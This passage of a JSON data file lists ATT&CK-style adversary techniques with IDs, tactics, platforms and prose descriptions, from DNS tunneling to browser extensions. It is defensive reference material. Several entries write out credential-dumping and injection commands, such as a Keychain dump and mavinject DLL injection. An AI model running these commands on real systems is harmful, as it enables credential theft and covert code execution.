goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares. On network devices, adversaries may wipe configuration files and other data from the device using Network Device CLI commands such as `erase`.", "detection": ""}, {"attack_id": "T1071.004", "name": "DNS", "tactics": ["command-and-control"], "platforms": ["ESXi", "Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. The DNS protocol serves an administrative function in computer networking and thus may be very common in environments. DNS traffic may also be allowed even before network authentication is completed. DNS packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling, adversaries may abuse DNS to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. DNS beaconing may be used to send commands to remote systems via DNS queries. A DNS beacon is created by tunneling DNS traffic (i.e. Protocol Tunneling). The commands may be embedded into different DNS records, for example, TXT or A records. DNS beacons may be difficult to detect because the beacons infrequently communicate with infected devices. Infrequent communication conceals the malicious DNS traffic with normal DNS traffic.", "detection": ""}, {"attack_id": "T1552.005", "name": "Cloud Instance Metadata API", "tactics": ["credential-access"], "platforms": ["IaaS"], "description": "Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data. Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance. A cloud metadata API has been used in at least one high profile compromise. If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API. The de facto standard across cloud service providers is to host the Instance Metadata API at http[:]//169.254.169.254.", "detection": ""}, {"attack_id": "T1555.002", "name": "Securityd Memory", "tactics": ["credential-access"], "platforms": ["Linux", "macOS"], "description": "An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization. A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc. In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. Apple’s `securityd` utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.", "detection": ""}, {"attack_id": "T1615", "name": "Group Policy Discovery", "tactics": ["discovery"], "platforms": ["Windows"], "description": "Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`. Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings. Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. Domain or Tenant Policy Modification) for their benefit.", "detection": ""}, {"attack_id": "T1542.003", "name": "Bootkit", "tactics": ["stealth", "persistence"], "platforms": ["Linux", "Windows"], "description": "Adversaries may use bootkits to persist on systems. A bootkit is a malware variant that modifies the boot sectors of a hard drive, allowing malicious code to execute before a computer's operating system has loaded. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly. In BIOS systems, a bootkit may modify the Master Boot Record (MBR) and/or Volume Boot Record (VBR). The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code. In UEFI (Unified Extensible Firmware Interface) systems, a bootkit may instead create or modify files in the EFI system partition (ESP). The ESP is a partition on data storage used by devices containing UEFI that allows the system to boot the OS and other utilities used by the system. An adversary can use the newly created or patched files in the ESP to run malicious kernel code.", "detection": ""}, {"attack_id": "T1025", "name": "Data from Removable Media", "tactics": ["collection"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information. Some adversaries may also use Automated Collection on removable media.", "detection": ""}, {"attack_id": "T1218.013", "name": "Mavinject", "tactics": ["stealth"], "platforms": ["Windows"], "description": "Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V). Adversaries may abuse mavinject.exe to inject malicious DLLs into running processes (i.e. Dynamic-link Library Injection), allowing for arbitrary code execution (ex. C:\\Windows\\system32\\mavinject.exe PID /INJECTRUNNING PATH_DLL). Since mavinject.exe may be digitally signed by Microsoft, proxying execution via this method may evade detection by security products because the execution is masked under a legitimate process. In addition to Dynamic-link Library Injection, Mavinject.exe can also be abused to perform import descriptor injection via its /HMODULE command-line parameter (ex. mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would inject an import table entry consisting of the specified DLL into the module at the given base address.", "detection": ""}, {"attack_id": "T1074.001", "name": "Local Data Staging", "tactics": ["collection"], "platforms": ["ESXi", "Linux", "macOS", "Windows"], "description": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location. Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.", "detection": ""}, {"attack_id": "T1036.005", "name": "Match Legitimate Resource Name or Location", "tactics": ["stealth"], "platforms": ["Containers", "ESXi", "Linux", "macOS", "Windows"], "description": "Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: `svchost.exe`). Alternatively, a Windows Registry key may be given a close approximation to a key used by a legitimate program. In containerized environments, a threat actor may create a resource in a trusted namespace or one that matches the naming convention of a container pod or cluster.", "detection": ""}, {"attack_id": "T1587.003", "name": "Digital Certificates", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA). Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: Asymmetric Cryptography with Web Protocols) or even enabling Adversary-in-the-Middle if added to the root of trust (i.e. Install Root Certificate). After creating a digital certificate, an adversary may then install that certificate (see Install Digital Certificate) on infrastructure under their control.", "detection": ""}, {"attack_id": "T1565.001", "name": "Stored Data Manipulation", "tactics": ["impact"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making. Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.", "detection": ""}, {"attack_id": "T1110.002", "name": "Password Cracking", "tactics": ["credential-access"], "platforms": ["Identity Provider", "Linux", "macOS", "Network Devices", "Office Suite", "Windows"], "description": "Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. OS Credential Dumping can be used to obtain password hashes, this may only get an adversary so far when Pass the Hash is not an option. Further, adversaries may leverage Data from Configuration Repository in order to obtain hashed credentials for network devices. Techniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network. The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.", "detection": ""}, {"attack_id": "T1114.001", "name": "Local Email Collection", "tactics": ["collection"], "platforms": ["Windows"], "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files. Outlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB. IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.", "detection": ""}, {"attack_id": "T1555.001", "name": "Keychain", "tactics": ["credential-access"], "platforms": ["macOS"], "description": "Adversaries may acquire credentials from Keychain. Keychain (or Keychain Services) is the macOS credential management system that stores account names, passwords, private keys, certificates, sensitive application data, payment data, and secure notes. There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain. The default Keychain is the Login Keychain, which stores user passwords and information. The System Keychain stores items accessed by the operating system, such as items shared among users on a host. The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service. Keychains can be viewed and edited through the Keychain Access application or using the command-line utility security. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/. Adversaries may gather user credentials from Keychain storage/memory. For example, the command security dump-keychain –d will dump all Login Keychain credentials from ~/Library/Keychains/login.keychain-db. Adversaries may also directly read Login Keychain credentials from the ~/Library/Keychains/login.keychain file. Both methods require a password, where the default password for the Login Keychain is the current user’s password to login to the macOS host.", "detection": ""}, {"attack_id": "T1547", "name": "Boot or Logon Autostart Execution", "tactics": ["persistence", "privilege-escalation"], "platforms": ["Linux", "macOS", "Windows", "Network Devices"], "description": "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon. These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.", "detection": ""}, {"attack_id": "T1003.004", "name": "LSA Secrets", "tactics": ["credential-access"], "platforms": ["Windows"], "description": "Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts. LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\\SECURITY\\Policy\\Secrets. LSA secrets can also be dumped from memory. Reg can be used to extract from the Registry. Mimikatz can be used to extract secrets from memory.", "detection": ""}, {"attack_id": "T1600", "name": "Weaken Encryption", "tactics": ["defense-impairment"], "platforms": ["Network Devices"], "description": "Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key. Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as Modify System Image, Reduce Key Space, and Disable Crypto Hardware, an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts.", "detection": ""}, {"attack_id": "T1606.002", "name": "SAML Tokens", "tactics": ["credential-access"], "platforms": ["SaaS", "Windows", "IaaS", "Office Suite", "Identity Provider"], "description": "An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate. The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter value of the conditions ... element in a token. This value can be changed using the AccessTokenLifetime in a LifetimeTokenPolicy. Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism. An adversary may utilize Private Keys to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate. This differs from Steal Application Access Token and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users. An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to Use Alternate Authentication Material, which may bypass multi-factor and other authentication protection mechanisms.", "detection": ""}, {"attack_id": "T1036.008", "name": "Masquerade File Type", "tactics": ["stealth"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file’s signature, extension, icon, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file’s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file’s type. For example, the header of a JPEG file, is 0xFF 0xD8 and the file extension is either `.JPE`, `.JPEG` or `.JPG`. Adversaries may edit the header’s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., Ingress Tool Transfer) and stored (e.g., Upload Malware) so that adversaries may move their malware without triggering detections. Common non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign. Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of test.gif. A user may not know that a file is malicious due to the benign appearance and file extension. Polyglot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.", "detection": ""}, {"attack_id": "T1489", "name": "Service Stop", "tactics": ["impact"], "platforms": ["ESXi", "IaaS", "Linux", "macOS", "Windows"], "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible. In some cases, adversaries may stop or disable many or all services to render systems unusable. Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server, or on virtual machines hosted on ESXi infrastructure. Threat actors may also disable or stop service in cloud environments. For example, by leveraging the `DisableAPIServiceAccess` API in AWS, a threat actor may prevent the service from creating service-linked roles on new accounts in the AWS Organization.", "detection": ""}, {"attack_id": "T1587.001", "name": "Malware", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors. During malware development, adversaries may intentionally include indicators aligned with other known actors in order to mislead attribution by defenders. As with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware. Some aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of Web Services.", "detection": ""}, {"attack_id": "T1652", "name": "Device Driver Discovery", "tactics": ["discovery"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. Security Software Discovery) or other defenses (e.g., Virtualization/Sandbox Evasion), as well as potential exploitable vulnerabilities (e.g., Exploitation for Privilege Escalation). Many OS utilities may provide information about local device drivers, such as `driverquery.exe` and the `EnumDeviceDrivers()` API function on Windows. Information about device drivers (as well as associated services, i.e., System Service Discovery) may also be available in the Registry. On Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.", "detection": ""}, {"attack_id": "T1087.002", "name": "Domain Account", "tactics": ["discovery"], "platforms": ["Linux", "macOS", "Windows"], "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges. Commands such as net user /domain and net group /domain of the Net utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain users and groups. PowerShell cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups.", "detection": ""}, {"attack_id": "T1547.014", "name": "Active Setup", "tactics": ["persistence", "privilege-escalation"], "platforms": ["Windows"], "description": "Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer. These programs will be executed under the context of the user and will have the account's associated permissions level. Adversaries may abuse Active Setup by creating a key under HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer. Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.", "detection": ""}, {"attack_id": "T1564", "name": "Hide Artifacts", "tactics": ["stealth"], "platforms": ["ESXi", "Linux", "macOS", "Office Suite", "Windows"], "description": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection. Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.", "detection": ""}, {"attack_id": "T1559.002", "name": "Dynamic Data Exchange", "tactics": ["execution"], "platforms": ["Windows"], "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution. Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by Component Object Model, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via Phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. Similarly, adversaries may infect payloads to execute applications and/or commands on a victim device by way of embedding DDE formulas within a CSV file intended to be opened through a Windows spreadsheet program. DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a Command and Scripting Interpreter. DDE execution can be invoked remotely via Remote Services such as Distributed Component Object Model (DCOM).", "detection": ""}, {"attack_id": "T1204.002", "name": "Malicious File", "tactics": ["execution"], "platforms": ["Linux", "macOS", "Windows"], "description": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, .reg, and .iso. Adversaries may employ various forms of Masquerading and Obfuscated Files or Information to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it. While Malicious File frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.", "detection": ""}, {"attack_id": "T1591.003", "name": "Identify Business Tempo", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization’s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim’s hardware and software resources. Adversaries may gather this information in various ways, such as direct elicitation via Phishing for Information. Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: Social Media or Search Victim-Owned Websites). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Phishing for Information or Search Open Websites/Domains), establishing operational resources (ex: Establish Accounts or Compromise Accounts), and/or initial access (ex: Supply Chain Compromise or Trusted Relationship)", "detection": ""}, {"attack_id": "T1685.004", "name": "Disable or Modify Linux Audit System Log", "tactics": ["defense-impairment"], "platforms": ["Linux"], "description": "Adversaries may disable or modify the Linux Audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules. Often referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`, containing a sequence of `auditctl` commands loaded at boot time. With root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.", "detection": ""}, {"attack_id": "T1071.005", "name": "Publish/Subscribe Protocols", "tactics": ["command-and-control"], "platforms": ["macOS", "Linux", "Windows", "Network Devices"], "description": "Adversaries may communicate using publish/subscribe (pub/sub) application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Protocols such as MQTT, XMPP, AMQP, and STOMP use a publish/subscribe design, with message distribution managed by a centralized broker. Publishers categorize their messages by topics, while subscribers receive messages according to their subscribed topics. An adversary may abuse publish/subscribe protocols to communicate with systems under their control from behind a message broker while also mimicking normal, expected traffic.", "detection": ""}, {"attack_id": "T1592.001", "name": "Hardware", "tactics": ["reconnaissance"], "platforms": ["PRE"], "description": "Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.). Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning (ex: hostnames, server banners, user agent strings) or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors. Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Compromise Hardware Supply Chain or Hardware Additions).", "detection": ""}, {"attack_id": "T1080", "name": "Taint Shared Content", "tactics": ["lateral-movement"], "platforms": ["Windows", "SaaS", "Linux", "macOS", "Office Suite"], "description": "Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally. A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses Shortcut Modification of directory .LNK files that use Masquerading to look like the real directories, which are hidden through Hidden Files and Directories. The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.", "detection": ""}, {"attack_id": "T1484.002", "name": "Trust Modification", "tactics": ["defense-impairment", "privilege-escalation"], "platforms": ["Identity Provider", "Windows"], "description": "Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources. These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge SAML Tokens without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user. An adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant. This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.", "detection": ""}, {"attack_id": "T1213.006", "name": "Databases", "tactics": ["collection"], "platforms": ["IaaS", "Linux", "macOS", "SaaS", "Windows"], "description": "Adversaries may leverage databases to mine valuable information. These databases may be hosted on-premises or in the cloud (both in platform-as-a-service and software-as-a-service environments). Examples of databases from which information may be collected include MySQL, PostgreSQL, MongoDB, Amazon Relational Database Service, Azure SQL Database, Google Firebase, and Snowflake. Databases may include a variety of information of interest to adversaries, such as usernames, hashed passwords, personally identifiable information, and financial data. Data collected from databases may be used for Lateral Movement, Command and Control, or Exfiltration. Data exfiltrated from databases may also be used to extort victims or may be sold for profit.", "detection": ""}, {"attack_id": "T1573.001", "name": "Symmetric Cryptography", "tactics": ["command-and-control"], "platforms": ["ESXi", "Linux", "macOS", "Network Devices", "Windows"], "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, DES, 3DES, Blowfish, and RC4.", "detection": ""}, {"attack_id": "T1087.001", "name": "Local Account", "tactics": ["discovery"], "platforms": ["ESXi", "Linux", "macOS", "Windows"], "description": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. Commands such as net user and net localgroup of the Net utility and id and groups on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS, the dscl . list /Users command can be used to enumerate local accounts. On ESXi servers, the `esxcli system account list` command can list local user accounts.", "detection": ""}, {"attack_id": "T1586.001", "name": "Social Media Accounts", "tactics": ["resource-development"], "platforms": ["PRE"], "description": "Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. Social Media Accounts), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. A variety of methods exist for compromising social media accounts, such as gathering credentials via Phishing for Information, purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps). Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos. Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others. Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).", "detection": ""}, {"attack_id": "T1176.001", "name": "Browser Extensions", "tactics": ["persistence"], "platforms": ["Linux", "Windows", "macOS"], "description": "Adversaries may abuse internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality to and customize aspects of internet browsers. They can be installed directly via a local file or custom URL or through a browser's app store - an official online platform where users can browse, install, and manage extensions for a specific web browser. Extensions generally inherit the web browser's permissions previously granted. Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores, so it may not be difficult for malicious extensions to defeat automated scanners. Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary-controlled server or manipulate the mobile configuration file to silently install additional extensions. Adversaries may abuse how chromium-based browsers load extensions by modifying or replacing the Preferences and/or Secure Preferences files to silently install malicious extensions. When the browser is not running, adversaries can alter these files, ensuring the extension is loaded, granted desired permissions, and will persist in browser sessions. This method does not require user consent and extensions are silently loaded in the background from disk or from the browser's trusted store. Previous to macOS 11, adversaries could silently install browser extensions via the command line using the profiles tool to install malicious .mobileconfig files. In macOS 11+, the use of the profiles tool can no longer install configuration profiles; however, .mobileconfig files can be planted and installed with user interaction. Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence. There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for Command and Control. Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security 